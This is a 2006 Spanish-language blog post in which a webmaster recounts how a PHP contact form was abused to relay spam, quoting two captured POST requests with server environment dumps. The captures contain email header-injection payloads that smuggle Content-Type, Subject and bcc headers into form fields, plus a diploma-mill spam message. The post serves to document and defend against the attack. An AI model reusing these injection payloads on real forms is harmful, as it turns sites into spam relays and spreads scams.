Publicado el Viernes 08 de diciembre de 2006 a las 06:18:36 por upadrian
Lecturas
Aqui devuelta yo, terminando lo que empezé. Siguiendo las directrices de mi anterior articulo, recolpile los siguientes datos después de reciber un ataque a un procesador de formulario hecho hace bastante tiempo, y el cual tuve que modificar después que el responsable me llamara enloquecido ya que lo estaban usando para enviar miles de emails spam.
Primero hicieron un intento, solo para probar y ver que salía: Contenido POST:nombre=things7941@xxx.com.uymotivo=things7941@xxx.com.uyemail=things7941@xxx.com.uySubmit=orthContent-Transfer-Encoding: quoted-printableContent-Type: text/htmlSubject: sizebcc: xx.xx@werndgains.comn individual slice of bacon is a rasher ( and reland), or a slice ( orth me= rica). raditionally the skin is left on the cut and is05162ac915939e3a05172375a08e9360.Contenido GET:Contenido SERVER:CONTENT_LENGTH=556CONTENT_TYPE=application/x-www-form-urlencodedDOCUMENT_ROOT=/home/xxx/public_htmlHTTP_ACCEPT=*/*HTTP_CONNECTION=Keep-AliveHTTP_HOST=www.xxx.com.uyHTTP_PRAGMA=no-cacheHTTP_REFERER=http://www.xxx.com.uy/HTTP_USER_AGENT=PycURL/7.15.5HTTP_VIA=1.1 SERVIDORPATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbinREMOTE_ADDR=213.195.77.88REMOTE_PORT=32510SCRIPT_FILENAME=/home/xxx/public_html/contacto1.phpSERVER_ADDR=xx.xx.xx.xxxxSERVER_ADMIN=webmaster@xxx.com.uySERVER_NAME=www.xxx.com.uySERVER_PORT=80SERVER_SIGNATURE=Apache/1.3.36 Server at www.xxx.com.uy Port 80SERVER_SOFTWARE=Apache/1.3.36 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.2 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.27 OpenSSL/0.9.7aGATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1REQUEST_METHOD=POSTQUERY_STRING=REQUEST_URI=/contacto1.phpSCRIPT_NAME=/contacto1.phpPATH_TRANSLATED=/home/xxx/public_html/contacto1.phpPHP_SELF=/contacto1.phpargv=Arrayargc=0 Después como el procesador les dijo: "Gracias por su contacto", pero en verdad no envió nada, solo un mail a mi con estos datos... siguieron:
contenido POST:nombre=ach@xxx.com.uymotivo=ach@xxx.com.uyemail=GetYourDegreeOnlineContent-Transfer-Encoding: quoted-printableContent-Type: text/plainSubject: urgentbcc: {AQUI PUSIERON 80 EMAILS}UNIVERSITY DIPLOMASObtain a prosperous future, money-earning power and the prestige that comes with having the career position you've always dreamed of. Diplomas from prestigious non-accredited universities based on your present knowledge and life experienceIf you qualify, no tests, classes, books or examinations will be required.Bachelors', Masters', MBA's, Doctorate & Ph.D. degrees available in your fi= eld.CONFIDENTIALITY ASSYREDCALL NOW TO RECEIVE YOUR DIPLOMA WITHIN 2 WEEKS 1(270)837-3127Call 24HRS, 7 days a week, including Sundays and holidays (be sure to leave your full name and phone number, clearly spoken).Submit=ach@xxx.com.uyContenido GET:Contenido SERVER:CONTENT_LENGTH=11101CONTENT_TYPE=application/x-www-form-urlencodedDOCUMENT_ROOT=/home/xxx/public_htmlHTTP_CONNECTION=Keep-AliveHTTP_HOST=www.xxx.com.uyHTTP_REFERER=http://www.xxx.com.uy/contacto1.phpPATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbinREMOTE_ADDR=68.80.34.8REMOTE_PORT=3055SCRIPT_FILENAME=/home/xxx/public_html/contacto1.phpSERVER_ADDR=xx.xx.xx.xxxSERVER_ADMIN=webmaster@xxx.com.uySERVER_NAME=www.xxx.com.uySERVER_PORT=80SERVER_SIGNATURE=Apache/1.3.36 Server at www.xxx.com.uy Port 80SERVER_SOFTWARE=Apache/1.3.36 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.2 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.27 OpenSSL/0.9.7aGATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1REQUEST_METHOD=POSTQUERY_STRING=REQUEST_URI=/contacto1.phpSCRIPT_NAME=/contacto1.phpPATH_TRANSLATED=/home/xxx/public_html/contacto1.phpPHP_SELF=/contacto1.phpargv=Arrayargc=0 El ataque lo frené, y esto me sirve para "espiar" un poco a mis atacantes. Pero el objetivo fué cumplido
